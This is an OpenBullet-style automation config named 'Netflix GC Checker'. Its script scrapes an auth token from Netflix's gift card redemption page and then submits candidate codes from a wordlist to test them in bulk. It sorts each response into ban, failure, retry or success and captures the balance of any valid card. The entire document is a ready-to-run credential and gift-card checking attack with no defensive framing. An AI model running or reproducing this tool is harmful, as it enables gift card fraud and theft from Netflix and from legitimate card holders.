[SETTINGS]
{
  "Name": "Netflix GC Checker",
  "SuggestedBots": 1,
  "LastModified": "2019-02-26T20:15:40.3166025+01:00",
  "AdditionalInfo": "",
  "Author": "Rotty",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "None",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST GET "https://www.netflix.com/redeem" AutoRedirect=FALSE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0" 
  HEADER "Pragma: no-cache" 
PARSE "<SOURCE>" LR "name=\"authURL\" value=\"" "\"" Recursive=FALSE -> VAR "auth" "" "" 
REQUEST POST "https://www.netflix.com/redeem" AutoRedirect=FALSE 
  CONTENT "authURL=<auth>&flow=giftCard&mode=redeem&action=nextAction&withFields=code&code=<USER>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://www.netflix.com/redeem" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN Ban OR 
    KEY "An error occurred during gift redemption" 
    KEY "We were unable to process your request." 
  KEYCHAIN Failure OR 
    KEY "The code entered is not valid" 
REQUEST GET "https://www.netflix.com/redeem/emailentry" AutoRedirect=FALSE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0" 
  HEADER "Pragma: no-cache" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "referer: https://www.netflix.com/redeem" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN Success OR 
    KEY "giftCreditValue" 
  KEYCHAIN Failure OR 
    KEY "{\"pageName\":\"giftCardLanding\"" 
    KEY "<SOURCE>" DoesNotContain "giftCreditValue" 
  KEYCHAIN Retry OR 
    KEY "<RESPONSECODE>" Contains "302" 
PARSE "<SOURCE>" LR "<span class=\"giftCreditValue\">" "</span>" Recursive=FALSE -> CAP "Balance : " "" "" 
